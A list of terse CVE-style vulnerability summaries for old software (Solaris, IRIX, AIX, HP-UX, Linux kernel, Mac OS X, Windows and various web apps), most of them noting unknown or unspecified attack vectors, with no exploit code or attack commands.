Multiple race conditions in Linux-VServer 1.22 with Linux kernel 2.4.23 and SMP allow local users to cause a denial of service (kernel oops) via unknown attack vectors related to the (1) s_info and (2) ip_info data structures and the (a) forget_original_parent, (b) goodness, (c) schedule, (d) update_process_times, and (e) vc_new_s_context functions.
Unknown vulnerability in the server login for VisualShapers ezContents 2.02 and earlier allows remote attackers to bypass access restrictions and gain access to restricted functions.
Unknown vulnerability in Nokia IPSO 3.7, configured as IP Clusters, allows remote attackers to cause a denial of service via unknown attack vectors.
X-CD-Roast 0.98 alpha10 through alpha14 allows local users to overwrite arbitrary files via a symlink attack on an unknown file.
Buffer overflow in the portmapper service (PMAP.NLM) in Novell NetWare 6 SP3 and ZenWorks for Desktops 3.2 SP2 through 4.0.1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via unknown attack vectors.
Unknown vulnerability in SunOne/iPlanet Web Server SP3 through SP5 on Windows platforms allows remote attackers to cause a denial of service.
Unknown vulnerability in ns-ldapd for Sun ONE Directory Server 4.16, 5.0, and 5.1 allows LDAP clients to cause a denial of service (service halt).
Unknown vulnerability in Sun Management Center (SunMC) 2.1.1, 3.0, and 3.0 Revenue Release (RR), when installed and run by root, allows local users to create or modify arbitrary files.
Unknown vulnerability in Internet Explorer 5.01 SP3 through 6.0 SP1 allows remote attackers to cause a denial of service (browser or Outlook Express crash) via HTML with certain input tags that are not properly rendered.
Buffer overflow in IBM Tivoli Firewall Toolbox (TFST) 1.2 allows remote attackers to execute arbitrary code via unknown vectors.
Unknown vulnerability in the "Automatic File Content Type Recognition (AFCTR) Tool version of the file package before 3.41, related to "a memory allocation problem," has unknown impact.
Unknown vulnerability in diagmond and possibly other applications in HP9000 Series 700/800 running HP-UX B.11.00, B.11.04, B.11.11, and B.11.22 allows remote attackers to cause a denial of service (program failure) via certain network traffic.
Unknown vulnerability in mail for Solaris 2.6 through 9 allows local users to read the email of other users.
Unknown vulnerability in UDP RPC for Solaris 2.5.1 through 9 for SPARC, and 2.5.1 through 8 for x86, allows remote attackers to cause a denial of service (memory consumption) via certain arguments in RPC calls that cause large amounts of memory to be allocated.
Unknown vulnerability in UFS for Solaris 9 for SPARC, with logging enabled, allows local users to cause a denial of service (UFS file system hang).
Unknown vulnerability in sendmail for Solaris 7, 8, and 9 allows local users to cause a denial of service (unknown impact) and possibly gain privileges via certain constructs in a .forward file.
Unknown vulnerability in the FTP server (in.ftpd) for Solaris 2.6 through 9 allows remote attackers to cause a denial of service (temporary FTP server hang), which affects other active mode FTP clients.
Unknown vulnerability in newtask for Solaris 9 allows local users to gain root privileges.
Unknown vulnerability in rpcbind for Solaris 2.6 through 9 allows remote attackers to cause a denial of service (rpcbind crash).
Unknown vulnerability in patches 108993-14 through 108993-19 and 108994-14 through 108994-19 for Solaris 8 may allow local users to cause a denial of service (automountd crash).
Unknown vulnerability in the sysinfo system call for Solaris for SPARC 2.6 through 9, and Solaris for x86 2.6, 7, and 8, allows local users to read kernel memory.
Unknown vulnerability in the libraries for the PGX32 frame buffer in Solaris 2.5.1 and 2.6 through 9 allows local users to gain root access.
Unknown vulnerability in CDE Print Viewer (dtprintinfo) for Sun Solaris 2.6 through 9 may allow local users to execute arbitrary code.
Unknown vulnerability in the ls-F builtin function in tcsh on Solaris 8 allows local users to create or delete files as other users, and gain privileges.
Format string vulnerability in enq command in AIX 4.3, 5.1, and 5.2 allows local users with rintq group privileges to gain privileges via unknown attack vectors.
Unknown vulnerability in fs_usage in Mac OS X 10.2.8 and 10.3.2 and Mac OS X Server 10.2.8 and 10.3.2 allows local users to gain privileges via unknown attack vectors.
Directory Services in Apple Mac OS X 10.0.2, 10.0.3, 10.2.8, 10.3.2 and Apple Mac OS X Server 10.2 through 10.3.2 accepts authentication server information from unknown LDAP or NetInfo sources as provided by a malicious DHCP server, which allows remote attackers to gain privileges.
Unknown vulnerability in Mac OS X 10.2.8 and 10.3.2 allows local users to bypass the screen saver login window and write a text clipping to the desktop or another application.
AppleFileServer (AFS) in Apple Mac OS X 10.2.8 and 10.3.2 does not properly handle certain malformed requests, with unknown impact.
Unknown multiple vulnerabilities in (1) lpstat and (2) the libprint library in Solaris 2.6 through 9 may allow attackers to execute arbitrary code or read or write arbitrary files.
Unknown "potential system security vulnerability" in Computer Associates (CA) Unicenter Remote Control 5.0 through 5.2, and ControlIT 5.0 and 5.1, may allow attackers to gain privileges to the local system account.
Unknown "Denial of Service Attack" vulnerability in Computer Associates (CA) Unicenter Remote Control (URC) 6.0 allows attackers to cause a denial of service (CPU consumption in URC host service).
Unknown "System Security Vulnerability" in Computer Associates (CA) Unicenter Remote Control (URC) 6.0 allows attackers to gain privileges via the help interface.
Unknown vulnerability in the mail command handler in Mailman before 2.0.14 allows remote attackers to cause a denial of service (crash) via malformed e-mail commands.
Unknown vulnerability in mod_python 3.0.x before 3.0.4, and 2.7.x before 2.7.9, allows remote attackers to cause a denial of service (httpd crash) via a certain query string.
Unknown vulnerability in the Terminal application for Mac OS X 10.3 (Client and Server) may allow "unauthorized access."
Unknown vulnerability in Windows Media Station Service and Windows Media Monitor Service components of Windows Media Services 4.1 allows remote attackers to cause a denial of service (disallowing new connections) via a certain sequence of TCP/IP packets.
Unknown vulnerability in minimalist mailing list manager 2.4, 2.2, and possibly other versions, allows remote attackers to execute arbitrary commands.
Unknown vulnerability in Mac OS X before 10.3 allows local users to access Dock functions from behind Screen Effects when Full Keyboard Access is enabled using the Keyboard pane in System Preferences.
Unknown vulnerability in QuickTime Java in Mac OS X v10.3 and Mac OS X Server 10.3 allows attackers to gain "unauthorized access to a system."
Integer overflows in (1) base64_encode and (2) the GD library for PHP before 4.3.3 have unknown impact and unknown attack vectors.
Buffer overflows in PHP before 4.3.3 have unknown impact and unknown attack vectors.
Unknown vulnerability in the HSQLDB component in JBoss 3.2.1 and 3.0.8 on Java 1.4.x platforms, when running in the default configuration, allows remote attackers to conduct unauthorized activities and possibly execute arbitrary code via certain SQL statements to (1) TCP port 1701 in JBoss 3.2.1, and (2) port 1476 in JBoss 3.0.8.
Unknown vulnerability in the SmartHTML interpreter (shtml.dll) in Microsoft FrontPage Server Extensions 2000 and 2002, and Microsoft SharePoint Team Services 2002, allows remote attackers to cause a denial of service (response failure) via a certain request.
Unknown vulnerability in rpc.mountd in SGI IRIX 6.5 through 6.5.22 allows remote attackers to cause a denial of service (process death) via unknown attack vectors.
Unknown vulnerability in rpc.mountd SGI IRIX 6.5.18 through 6.5.22 allows remote attackers to mount from unprivileged ports even with the -n option disabled.
Unknown vulnerability in the Internet Printing Protocol (IPP) implementation in CUPS before 1.1.19 allows remote attackers to cause a denial of service (CPU consumption from a "busy loop") via certain inputs to the IPP port (TCP 631).
Unknown vulnerability in ecartis before 1.0.0 does not properly validate user input, which allows attackers to obtain mailing list passwords.
saned in sane-backends 1.0.7 and earlier does not properly "check the validity of the RPC numbers it gets before getting the parameters," with unknown consequences.
Unknown vulnerability in the pam_filter mechanism in pam_ldap before version 162, when LDAP based authentication is being used, allows users to bypass host-based access restrictions and log onto the system.
Unknown vulnerability in mah-jong 1.5.6 and earlier allows remote attackers to cause a denial of service (tight loop).
Unknown vulnerability in an ISAPI plugin for ISS Server Sensor 7.0 XPU 20.16, 20.18, and possibly other versions before 20.19, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code in Internet Information Server (IIS) via a certain URL through SSL.
"Memory bugs" in OpenSSH 3.7.1 and earlier, with unknown impact, a different set of vulnerabilities than CVE-2003-0693 and CVE-2003-0695.
A "potential buffer overflow in ruleset parsing" for Sendmail 8.12.9, when using the nonstandard rulesets (1) recipient (2), final, or (3) mailer-specific envelope recipients, has unknown consequences.
Unknown vulnerability in NFS for SGI IRIX 6.5.21 and earlier may allow an NFS client to bypass read-only restrictions.
Unknown vulnerability in the libcpr library for the Checkpoint/Restart (cpr) system on SGI IRIX 6.5.21f and earlier allows local users to truncate or overwrite certain files.
Unknown vulnerability in Solaris 2.6 through 9 causes a denial of service (system panic) via "a rare race condition" or an attack by local users.
Unknown vulnerability in the Local Security Authority Subsystem Service (LSASS) in Windows 2000 domain controllers allows remote attackers to cause a denial of service via a crafted LDAP message.
Unknown vulnerability in Novell iChain 2.2 before Support Pack 1 allows users to access restricted or secure pages without authentication.
Multiple buffer overflows in Novell iChain 2.1 before Field Patch 3, and iChain 2.2 before Field Patch 1a, allow attackers to cause a denial of service (ABEND) and possibly execute arbitrary code via (1) a long user name or (2) an unknown attack related to a "special script against login."
Unknown vulnerability or vulnerabilities in Novell iChain 2.2 before Support Pack 1, with unknown impact, possibly related to unauthorized access to (1) NCPIP.NLM and (2) JSTCP.NLM.
Unknown vulnerability in the Virtual File System (VFS) capability for phpGroupWare 0.9.16preRC and versions before 0.9.14.004 with unknown implications, related to the VFS path being under the web document root.
Unknown vulnerability in display of Merge before 5.3.23a in UnixWare 7.1.x allows local users to gain root privileges.
Unknown vulnerability in the NFS daemon (nfsd) in SGI IRIX 6.5.19f and earlier allows remote attackers to cause a denial of service (kernel panic) via certain packets that cause XDR decoding errors, a different vulnerability than CVE-2003-0619.
Unknown vulnerability in SGI IRIX 6.5.x through 6.5.20, and possibly earlier versions, allows local users to cause a core dump in scheme and possibly gain privileges via certain environment variables, a different vulnerability than CVE-2001-0797 and CVE-1999-0028.
The DNS callbacks in nsd in SGI IRIX 6.5.x through 6.5.20f, and possibly earlier versions, do not perform sufficient sanity checking, with unknown impact.
Unknown vulnerability in nsd in SGI IRIX 6.5.x through 6.5.20f, and possibly earlier versions, allows attackers to cause a denial of service (memory consumption).
Unknown vulnerability in the IPv6 capability in IRIX 6.5.19 causes snoop to process packets as the root user, with unknown implications.
Unknown vulnerability in ip_nat_sack_adjust of Netfilter in Linux kernels 2.4.20, and some 2.5.x, when CONFIG_IP_NF_NAT_FTP or CONFIG_IP_NF_NAT_IRC is enabled, or the ip_nat_ftp or ip_nat_irc modules are loaded, allows remote attackers to cause a denial of service (crash) in systems using NAT, possibly due to an integer signedness error.
Unknown vulnerability in HP NonStop Server D40.00 through D48.03, and G01.00 through G06.20, allows local users to gain additional privileges.
Ethereal 0.9.12 and earlier does not handle certain strings properly, with unknown consequences, in the (1) BGP, (2) WTP, (3) DNS, (4) 802.11, (5) ISAKMP, (6) WSP, (7) CLNP, (8) ISIS, and (9) RMI dissectors.
The tvb_get_nstringz0 function in Ethereal 0.9.12 and earlier does not properly handle a zero-length buffer size, with unknown consequences.
Unknown vulnerability in the DCERPC (DCE/RPC) dissector in Ethereal 0.9.12 and earlier allows remote attackers to cause a denial of service (memory consumption) via a certain NDR string.
Unknown vulnerability in Apple File Service (AFP Server) for Mac OS X Server, when sharing files on a UFS or re-shared NFS volume, allows remote attackers to overwrite arbitrary files.
Multiple unknown vulnerabilities in Nessus before 2.0.6, in libnessus and possibly libnasl, a different set of vulnerabilities than those identified by CVE-2003-0372 and CVE-2003-0373, aka "similar issues in other nasl functions as well as in libnessus."
Format string vulnerability in LICQ 1.2.6, 1.0.3 and possibly other versions allows remote attackers to perform unknown actions via format string specifiers.
Unknown vulnerability in GNU Ghostscript before 7.07 allows attackers to execute arbitrary commands, even when -dSAFER is enabled, via a PostScript file that causes the commands to be executed from a malicious print job.
Buffer overflow in unknown versions of Maelstrom allows local users to execute arbitrary code via a long -player command line argument.
leksbot 1.2.3 in Debian GNU/Linux installs the KATAXWR as setuid root, which allows local users to gain root privileges by exploiting unknown vulnerabilities related to the escalated privileges, which KATAXWR is not designed to have.
** DISPUTED **
Unknown vulnerability in the TTY layer of the Linux kernel 2.4 allows attackers to cause a denial of service ("kernel oops").
Unknown vulnerability in Cisco Catalyst 7.5(1) allows local users to bypass authentication and gain access to the enable mode without a password.
Lotus Domino Web Server (nhttp.exe) before 6.0.1 allows remote attackers to cause a denial of service via a "Fictionary Value Field POST request" as demonstrated using the s_Validation form with a long, unknown parameter name.
Unknown vulnerability in ftpd in IBM AIX 5.2, when configured to use Kerberos 5 for authentication, allows remote attackers to gain privileges via unknown attack vectors.
Unknown vulnerability in bonsai Mozilla CVS query tool allows remote attackers to execute arbitrary commands as the www-data user.
Unknown vulnerability in tcpdump before 3.7.2 related to an inability to "Handle unknown RADIUS attributes properly," allows remote attackers to cause a denial of service (infinite loop), a different vulnerability than CAN-2003-0093.
Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
Unknown vulnerability in apcupsd before 3.8.6, and 3.10.x before 3.10.5, allows remote attackers to gain root privileges, possibly via format strings in a request to a slave server.
Unknown vulnerability in CGI module for PHP 4.3.0 allows attackers to access arbitrary files as the PHP user, and possibly execute PHP code, by bypassing the CGI force redirect settings (cgi.force_redirect or --enable-force-cgi-redirect).
Unknown vulnerability in the directory parser for Direct Connect 4 Linux (dcgui) before 0.2.2 allows remote attackers to read files outside the sharelist.
Unknown vulnerability in the chk_trans.c of the libkrb5 library for MIT Kerberos V5 before 1.2.5 allows users from one realm to impersonate users in other realms that have the same inter-realm keys.
Unknown vulnerability in the DNS intrusion detection application filter for Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (blocked traffic to DNS servers) via a certain type of incoming DNS request that is not properly handled.
Unspecified vulnerability in GoAhead WebServer before 2.1.4 allows remote attackers to cause "incorrect behavior" via unknown "malicious code," related to incorrect use of the socketInputBuffered function by sockGen.c.
Unspecified vulnerability in pprosetup in Sun PatchPro 2.0 has unknown impact and attack vectors related to "unsafe use of temporary files."
Memory leak in the (1) httpd, (2) nntpd, and (3) vpn driver in VelociRaptor 1.0 allows remote attackers to cause a denial of service (memory consumption) via an unknown method.
Unspecified vulnerability in the ied command in HP-UX 10.10, 10.20, and 11.0 allows local users to view "normally invisible data" via unknown attack vectors.
Unspecified vulnerability in LDAP Module in System Authentication of Open Source Internet Solutions (OSIS) 5.4 running on Tru64 UNIX 4.0G and 4.0F allows remote attackers to gain access to arbitrary files or gain privileges via unknown attack vectors.
Unspecified vulnerability in Internet Group Management Protocol (IGMP) of HP Tru64 4.0F through 5.1A allows remote attackers to cause a denial of service via unknown attack vectors.  NOTE: this might be the same issue as CVE-2002-2185, but there are insufficient details to be certain.
Unspecified vulnerability in xntpd of HP-UX 10.20 through 11.11 allows remote attackers to cause a denial of service (hang) via unknown attack vectors.
Buffer overflow in the French documentation patch for Gnuplot 3.7 in SuSE Linux before 8.0 allows local users to execute arbitrary code as root via unknown attack vectors.
CRLF injection vulnerability in the setUserValue function in sipssys/code/site.inc.php in Haakon Nilsen simple, integrated publishing system (SIPS) before 20020209 has unknown impact, possibly gaining privileges or modifying critical configuration, via a CRLF sequence in a key value.
Unspecified "security vulnerability" in Baby FTP Server versions before November 7, 2002 has unknown impact and attack vectors.
Unknown vulnerability in the System Serial Console terminal in Solaris 2.5.1, 2.6, and 7 allows local users to monitor keystrokes and possibly steal sensitive information.
Unknown vulnerability in Sun Solaris 8.0 allows local users to cause a denial of service (kernel panic) via a program that uses /dev/poll, triggering a NULL pointer dereference.
Unknown "file disclosure" vulnerability in Macromedia JRun 3.0, 3.1, and 4.0, related to a log file or jrun.ini, with unknown impact.
Directory traversal vulnerability in Perl-HTTPd before 1.0.2 allows remote attackers to view arbitrary files via a .. (dot dot) in an unknown argument.
Unknown vulnerability in the "VAIO Manual" software in certain Sony VAIO personal computers sold from November 2001 to January 2002, allows remote attackers to modify data via a web page or HTML e-mail.
Next Generation POSIX Threading (NGPT) 1.9.0 uses a filesystem-based shared memory entry, which allows local users to cause a denial of service or in threaded processes or spoof files via unknown methods.
The get_parameter_from_freqency_source function in beep2 1.0, 1.1 and 1.2, when installed setuid root, allows local users to read arbitrary files via unknown attack vectors.
Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
Unknown vulnerability in Java web start 1.0.1_01, 1.0.1, 1.0 and 1.0.1.01 (HP-UX 11.x only) allows attackers to gain access to restricted resources via unknown attack vectors.
Buffer overflow in Volume Manager daemon (vold) of Sun Solaris 2.5.1 through 8 allows local users to execute arbitrary code via unknown attack vectors.
Unknown vulnerability in Parallel port powerSwitch (aka pp_powerSwitch) 0.1 does not properly enforce access controls, which allows local users to access arbitrary ports.
Unknown vulnerability in WesMo phpEventCalendar 1.1 allows remote attackers to execute arbitrary commands via unknown attack vectors.
Multiple buffer overflows in Gringotts 0.5.9 allows local users to execute arbitrary commands via unknown attack vectors.
Buffer overflow in Microsoft Active Data Objects (ADO) in Microsoft MDAC 2.5 through 2.7 allows remote attackers to have unknown impact with unknown attack vectors.  NOTE: due to the lack of details available regarding this issue, perhaps it should be REJECTED.
Unknown vulnerability in AolSecurityPrivate.class in Oracle E-Business Suite 11i 11.1 through 11.6 allows remote attackers to bypass user authentication checks via unknown attack vectors.
Buffer overflow in WS_FTP Pro 7.5 allows remote attackers to execute code on a client system via unknown attack vectors.
Unknown vulnerability in the "ipopts decode" functionality in Firestorm IDS 0.4.0 through 0.4.2 allows remote attackers to cause a denial of service (crash) via certain IP options.
Unknown vulnerability in Veritas Cluster Server (VCS) 1.2 for WindowsNT, Cluster Server 1.3.0 for Solaris, and Cluster Server 1.3.1 for HP-UX allows attackers to gain privileges via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unknown vulnerability in pam_authz in the LDAP-UX Integration product on HP-UX 11.00 and 11.11 allows remote attackers to execute r-commands with privileges of other users.
Buffer overflow in uux in eoe.sw.uucp package of SGI IRIX 6.5 through 6.5.17 allows local users to execute arbitrary code via unknown attack vectors.
Unknown vulnerability in inetd in HP Tru64 Unix 4.0f through 5.1a allows remote attackers to cause a denial of service via unknown attack vectors.
Multiple SQL injection vulnerabilities in PHProjekt 2.0 through 3.1 allow remote attackers to execute arbitrary SQL commands via the unknown attack vectors.
Unknown vulnerability in Slash 2.1.x and 2.2 through 2.2.2, as used in Slashcode, allows remote authenticated users to gain access to arbitrary accounts.
Unknown vulnerability in CGINews before 1.06 allow remote attackers to read arbitrary files via "unfiltered user input."
Buffer overflow in dlogin 1.0a could allow local users to gain privileges via unknown attack vectors.
Unknown vulnerability in Bavo 0.3 allows remote attackers to modify posted messages.
Unknown vulnerability in AIX before 4.0 with unknown attack vectors and unknown impact, aka "security issue," as fixed by APAR IY28225.
Unknown vulnerability in the login program on AIX before 4.0 could allow remote users to specify 100 or more environment variables when logging on, which exceeds the length of a certain string, possibly triggering a buffer overflow.
Buffer overflow in lscfg of unknown versions of AIX has unknown impact.
Unknown vulnerability in Oracle E-Business Suite 11i.1 through 11i.6 allows remote attackers to execute unauthorized PL/SQL procedures by modifying the Oracle Applications URL.
Multiple buffer overflows in Oracle Web Cache for Oracle 9i Application Server (9iAS) allow remote attackers to execute arbitrary code via unknown vectors.
Unknown vulnerability in IBM AIX Parallel Systems Support Programs (PSSP) 3.1.1, 3.2, and 3.4 allows remote attackers to read arbitrary files from a file collection.
Unknown vulnerability in ping in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allows local users to cause a denial of service.
Unknown vulnerability in Solaris 8, when the 0x02 bit (aka TEST, KMF_DEADBEEF, or deadbeef) is set in the kmem_flags kernel parameter, allows local users to cause a denial of service (system panic).
Unknown vulnerability in Solaris 8 for Intel and Solaris 8 and 9 for SPARC allows remote attackers to cause a denial of service via certain packets that cause some network interfaces to stop responding to TCP traffic.
Unknown vulnerability in the AUTH_DES authentication for RPC in Solaris 2.5.1, 2.6, and 7, SGI IRIX 6.5 to 6.5.19f, and possibly other platforms, allows remote attackers to gain privileges.
SAP GUI (Sapgui) 4.6D allows remote attackers to cause a denial of service (crash) via a connection to a high-numbered port, which generates an "unknown connection data" error.
Buffer overflow in the ixj telephony card driver in Linux before 2.4.20 has unknown impact and attack vectors.
Unspecified vulnerability in the pcilynx ieee1394 firewire driver (pcilynx.c) in Linux kernel before 2.4.20 has unknown impact and attack vectors, related to "wrap handling."
Signed integer overflow in the bttv_read function in the bttv driver (bttv-driver.c) in Linux kernel before 2.4.20 has unknown impact and attack vectors.
Unknown vulnerability in autofs on AIX 4.3.0, when using executable maps, allows attackers to execute arbitrary commands as root, possibly related to "string handling around how the executable map is called."
Unknown vulnerability in the ARP component for HP Tru64 UNIX 4.0f, 4.0g, and 5.0a allows remote attackers to "take over packets destined for another host" and cause a denial of service.
Unknown vulnerability or vulnerabilities in TCP/IP component for HP Tru64 UNIX 4.0f, 4.0g, and 5.0a allows remote attackers to cause a denial of service.
Unknown vulnerability related to stack corruption in the TGA daemon for HP-UX 11.04 (VVOS) Virtualvault 4.0, 4.5, and 4.6 may allow attackers to obtain access to system files.
Unknown vulnerability in Sympoll 1.2 allows remote attackers to read arbitrary files when register_globals is enabled, possibly by modifying certain PHP variables through URL parameters.
Unknown vulnerability or vulnerabilities in HP OpenView EMANATE 14.2 snmpModules allow the SNMP read-write community name to be exposed, related to (1) "'read-only' community access," and/or (2) an easily guessable community name.
Unknown vulnerability in passwd for VVOS HP-UX 11.04, with unknown impact, related to "Unexpected behavior."
Unknown vulnerability in cash_out and possibly other functions in PostgreSQL 7.2.1 and earlier, and possibly later versions before 7.2.3, with unknown impact, based on an invalid integer input which is processed as a different data type, as demonstrated using cash_out(2).
Unknown vulnerability in smb2www 980804-16 and earlier allows remote attackers to execute arbitrary commands.
Unknown vulnerability in the telnet KIO subsystem (telnet.protocol) of KDE 2.x 2.1 and later allows local and remote attackers to execute arbitrary code via a certain URL.
Unknown vulnerability in the rlogin KIO subsystem (rlogin.protocol) of KDE 2.x 2.1 and later, and KDE 3.x 3.0.4 and earlier, allows local and remote attackers to execute arbitrary code via a certain URL.
Unknown vulnerability in html2ps HTML/PostScript converter 1.0, when used within LPRng, allows remote attackers to execute arbitrary code via "unsanitized input."
Unknown vulnerability in NetInfo Manager application in Mac OS X 10.2.2 allows local users to access restricted parts of a filesystem.
Unknown vulnerability in NFS on Solaris 2.5.1 through Solaris 9 allows an NFS client to cause a denial of service by killing the lockd daemon.
Unknown vulnerabilities in Heimdal before 0.5 with unknown impact, possibly in the (1) kadmind and (2) kdc servers, may allow remote or local attackers to gain root or other access, but not via buffer overflows (CVE-2002-1225).
Unknown vulnerability in routed for HP Tru64 UNIX V4.0F through V5.1A allows local and remote attackers to read arbitrary files.
Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors.
Unknown vulnerability in Compaq WEBES Service Tools 2.0 through WEBES 4.0 (Service Pack 5) allows local users to read privileged files.
Unknown vulnerability in DCE (1) SMIT panels and (2) configuration commands, possibly related to relative pathnames.
Unknown vulnerability in the WebSecure (DFSWeb) configuration utilities in AIX 4.x, possibly related to relative pathnames.
Unknown vulnerability in HP Instant Support Enterprise Edition (ISEE) product U2512A for HP-UX 11.00 and 11.11 may allow authenticated users to access restricted files.
Unknown vulnerability in IPV6 functionality for DCE daemons (1) dced or (2) rpcd on HP-UX 11.11 allows attackers to cause a denial of service (crash) via an attack that modifies internal data.
Unknown vulnerability in the hosting process (dllhost.exe) for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allows remote attackers to gain privileges by executing an out of process application that acquires LocalSystem privileges, aka "Out of Process Privilege Elevation."
Unknown vulnerability in Cluster Interconnect for HP TruCluster Server 5.0A, 5.1, and 5.1A may allow local and remote attackers to cause a denial of service.
Unknown vulnerability in the Certificate Enrollment ActiveX Control in Microsoft Windows 98, Windows 98 Second Edition, Windows Millennium, Windows NT 4.0, Windows 2000, and Windows XP allow remote attackers to delete digital certificates on a user's system via HTML.
Unknown vulnerability in nveventd in NetVisualyzer on SGI IRIX 6.5 through 6.5.16 allows local users to write arbitrary files and gain root privileges.
Unknown vulnerability in ndd for HP-UX 11.11 with certain TRANSPORT patches allows attackers to cause a denial of service.
Unknown vulnerability in rpc.passwd in the nfs.sw.nis subsystem of SGI IRIX 6.5.15 and earlier allows local users to gain root privileges.
Unknown vulnerability in Mail for SGI IRIX 6.5 through 6.5.15f, and possibly earlier versions, when running with the -R option, allows local and remote attackers to cause a core dump.
Unknown vulnerability in SCO OpenServer 5.0.6 and earlier allows local users to modify critical information such as certain CPU registers and segment descriptors.
Unknown vulnerability in CDE in Caldera OpenUnix 7.1.0, 7.1.1, and 8.0 allows an xterm session to gain privileges when the session is reused.
Unknown vulnerability in Tomcat 3.2.1 running on HP Secure OS for Linux 1.0 allows attackers to access servlet resources.  NOTE: due to the vagueness of the vendor advisory, it is not clear whether this issue is already covered by other CVE identifiers.
Unknown vulnerability in IP defragmenter (frag2) in Snort before 1.8.3 allows attackers to cause a denial of service (crash).
Unknown vulnerability in Allaire JRun 3.1 allows remote attackers to directly access the WEB-INF and META-INF directories and execute arbitrary JavaServer Pages (JSP), a variant of CVE-2000-1050.
Unknown vulnerability in the file system protection subsystem in HP Secure OS Software for Linux 1.0 allows additional user privileges on some files beyond what is specified in the file system protection rules, which allows local users to conduct unauthorized operations on restricted files.
Unknown vulnerability in the SMTP server in Lotus Domino 5.0 through 5.7 allows remote attackers to bypass mail relaying restrictions via crafted e-mail addresses in "RCPT TO" commands.
Unknown vulnerability in login for AIX 5.1L, when using loadable authentication modules, allows remote attackers to gain access to the system.
Unknown vulnerability in ColdFusion Server 2.0 through 4.5.1 SP2 allows remote attackers to overwrite templates with zero byte files via unknown attack vectors.
Unknown vulnerabilities in the UDP port allocation for Linux kernel before 2.2.19 could allow local users to cause a denial of service (deadlock).
Unknown vulnerabilities in strnlen_user for Linux kernel before 2.2.19, with unknown impact.
Unknown vulnerability in sockfilter for Linux kernel before 2.2.19 related to "boundary cases," with unknown impact.
Unknown vulnerability in classifier code for Linux kernel before 2.2.19 could result in denial of service (hang).
Unknown vulnerability in binfmt_misc in the Linux kernel before 2.2.19, related to user pages.
Multiple vulnerabilities in phpMyChat before 0.14.5 exist in (1) input.php3, (2) handle_inputH.php3, or (3) index.lib.php3 with unknown consequences, possibly related to user spoofing or improperly initialized variables.
Vulnerability in lsmcode in unknown versions of AIX, possibly related to a usage error.
Atmel Firmware 1.3 Wireless Access Point (WAP) allows remote attackers to cause a denial of service via a SNMP request with (1) a community string other than "public" or (2) an unknown OID, which causes the WAP to deny subsequent SNMP requests.
Unknown vulnerability in Oracle Label Security in Oracle 8.1.7 and 9.0.1, when audit functionality, SET_LABEL, or SQL*Predicate is being used, allows local users to gain additional access.
Unknown vulnerability in netprint in IRIX 6.2, and possibly other versions, allows local users with lp privileges attacker to execute arbitrary commands via the -n option.
Multiple unspecified vulnerabilities in NWFTPD.nlm before 5.01o in the FTP server in Novell NetWare 5.1 SP3 allow remote attackers to bypass intended restrictions on anonymous access via unknown vectors.
Unspecified vulnerability in Haakon Nilsen simple, integrated publishing system (SIPS) before 0.2.4 has an unknown impact and attack vectors, related to a "grave security fault."
Unspecified vulnerability in siteman.php3 in AnyPortal(php) before 22 APR 00 allows remote attackers to obtain sensitive information via unknown attack vectors, which reveal the absolute path.  NOTE: the provenance of this information is unknown; the details are obtained from third party information.
upgrade.php3 in Phorum 3.0.7 could allow remote attackers to modify certain Phorum database tables via an unknown method.
NETBIOS client in Windows 95 and Windows 98 allows a remote attacker to cause a denial of service by changing a file sharing service to return an unknown driver type, which causes the client to crash.
cmd5checkpw 0.21 and earlier allows remote attackers to cause a denial of service via an "SMTP AUTH" command with an unknown username.
Unknown vulnerability in Generic-NQS (GNQS) allows local users to gain root privileges.
Unspecified vulnerability in crontab in IBM AIX 3.2 allows local users to gain root privileges via unknown attack vectors.
Unknown vulnerability in (1) loadmodule, and (2) modload if modload is installed with setuid/setgid privileges, in SunOS 4.1.1 through 4.1.3c, and Open Windows 3.0, allows local users to gain root privileges via environment variables, a different vulnerability than CVE-1999-1586.
Multiple unknown vulnerabilities in the "r-cmnds" (1) remshd, (2) rexecd, (3) rlogind, (4) rlogin, (5) remsh, (6) rcp, (7) rexec, and (8) rdist for HP-UX 10.00 through 11.00 allow attackers to gain privileges or access files.

